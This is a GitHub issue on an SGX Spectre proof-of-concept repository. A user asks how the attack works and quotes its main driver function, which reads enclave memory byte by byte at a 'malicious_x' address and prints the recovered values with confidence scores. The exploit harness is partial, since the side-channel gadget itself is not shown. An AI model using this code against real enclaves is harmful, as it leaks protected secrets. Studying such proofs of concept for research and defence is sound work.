spectre-attack-sgx
spectre-attack-sgx copied to clipboard
lsds
Working mechanism of sgx spectre attack
Could anyone explain the working mechanism of sgx spectre attack ?
How is ecall_get_offset() caching function actually used in this sgx spectre exploit ?
int spectre_main(int argc, char **argv) {
size_t malicious_x;
sgx_status_t ret = ecall_get_offset(global_eid, &malicious_x); /* default for malicious_x */
if (ret != SGX_SUCCESS)
abort();
int i, score[2], len=40;
uint8_t value[2];
for (i = 0; i < sizeof(array2); i++)
array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
if (argc == 3) {
sscanf(argv[1], "%p", (void**)(&malicious_x));
malicious_x -= (size_t)array1dupe; /* Convert input value into a pointer */
sscanf(argv[2], "%d", &len);
}
printf("Reading %d bytes:\n", len);
while (--len >= 0) {
printf("Reading at malicious_x = %p... ", (void*)malicious_x);
readMemoryByte(malicious_x++, value, score);
printf("%s: ", (score[0] >= 2*score[1] ? "Success" : "Unclear"));
printf("0x%02X='%c' score=%d ", value[0], (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
if (score[1] > 0)
printf("(second best: 0x%02X score=%d)", value[1], score[1]);
printf("\n");
}
return (0);
}
